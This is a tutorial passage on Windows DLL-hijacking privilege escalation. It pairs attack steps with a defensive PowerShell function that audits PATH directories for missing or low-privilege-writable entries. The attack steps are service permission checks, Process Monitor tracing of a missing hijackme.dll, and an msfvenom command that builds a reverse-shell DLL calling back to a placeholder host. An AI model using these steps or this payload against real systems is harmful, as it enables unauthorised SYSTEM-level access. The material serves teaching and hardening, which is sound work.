Often a service will try to load functionality from a library called a DLL (`dynamic-link library`). Whatever functionality the DLL provides will be executed with the same privileges as the service that loaded it. If a DLL is loaded with an absolute path, it might be possible to escalate privileges if that DLL is writable by our user. A more common misconfiguration that can be used to escalate privileges is a DLL that is missing from the system while our user has write access to a directory within the PATH that Windows searches for DLLs in. Unfortunately, initial detection of vulnerable services is difficult, and often the entire process is very manual.

```powershell
# check whether our user can start/stop the service
accesschk.exe /accepteula -uvqc user dllsvc

# check the service configuration (binary path, start type, account)
# note: in PowerShell `sc` is an alias for Set-Content, so use sc.exe
sc qc dllsvc
sc.exe qc dllsvc

# Run procmon with Admin privileges to analyze the dll file
#   Ctrl + L opens the filter configuration
#   add the filter: Process Name is dllhijackservice.exe
# start the service again
# back in ProcMon, note "NAME NOT FOUND" errors associated with 'hijackme.dll'

# create a reverse shell (run on the attacking machine)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=lhost LPORT=lport -f dll -o /tools/hijackme.dll
```
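The writable-PATH-directory condition described above is the part a defender can audit directly. The following is an added example, not part of the original notes: it walks the machine-wide PATH and reports every entry that is either missing (so it could be created later by whoever gets there first) or grants file-creation, permission-change or take-ownership rights to a low-privileged principal. The list of principals treated as "low-privileged" is an assumption and should be adjusted to the environment.

```powershell
# Added example (not from the original notes): audit machine PATH directories
# for ACLs that would let a low-privileged user plant a DLL there.
# Assumption: the principals below are the ones considered low-privileged.
function Get-WritablePathDirectory {
    param(
        [string[]]$LowPrivPrincipals = @(
            'Everyone',
            'BUILTIN\Users',
            'NT AUTHORITY\Authenticated Users',
            'NT AUTHORITY\INTERACTIVE'
        )
    )

    # Rights that allow dropping a file into the directory, or allow the
    # principal to grant themselves that ability. Modify and FullControl
    # include these bits, so they match as well.
    $writeMask = [System.Security.AccessControl.FileSystemRights]::CreateFiles -bor
                 [System.Security.AccessControl.FileSystemRights]::CreateDirectories -bor
                 [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
                 [System.Security.AccessControl.FileSystemRights]::TakeOwnership

    $pathDirs = [Environment]::GetEnvironmentVariable('Path', 'Machine') -split ';' |
        ForEach-Object { $_.Trim() } |
        Where-Object { $_ }

    foreach ($dir in $pathDirs) {
        if (-not (Test-Path -LiteralPath $dir -PathType Container)) {
            # A PATH entry that does not exist is a finding in itself: whoever
            # can create it later controls a DLL search directory.
            [PSCustomObject]@{
                Directory = $dir; Finding = 'MISSING'; Principal = ''; Rights = ''
            }
            continue
        }

        try {
            $acl = Get-Acl -LiteralPath $dir -ErrorAction Stop
        } catch {
            [PSCustomObject]@{
                Directory = $dir; Finding = 'ACL-UNREADABLE'; Principal = ''; Rights = $_.Exception.Message
            }
            continue
        }

        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            if (($ace.FileSystemRights -band $writeMask) -eq 0) { continue }

            [PSCustomObject]@{
                Directory = $dir
                Finding   = 'WRITABLE-BY-LOW-PRIV'
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
}

# Usage: list findings; an empty result means no PATH entry is missing or
# writable by the listed principals.
Get-WritablePathDirectory | Format-Table -AutoSize
```

Any `WRITABLE-BY-LOW-PRIV` or `MISSING` row is a hardening item: tighten the directory ACL (or remove the entry from the machine PATH) rather than leaving a search directory that every service on the host will consult for DLLs it cannot find elsewhere. Inherited ACEs are included in `$acl.Access`, so a permissive parent directory shows up through its children.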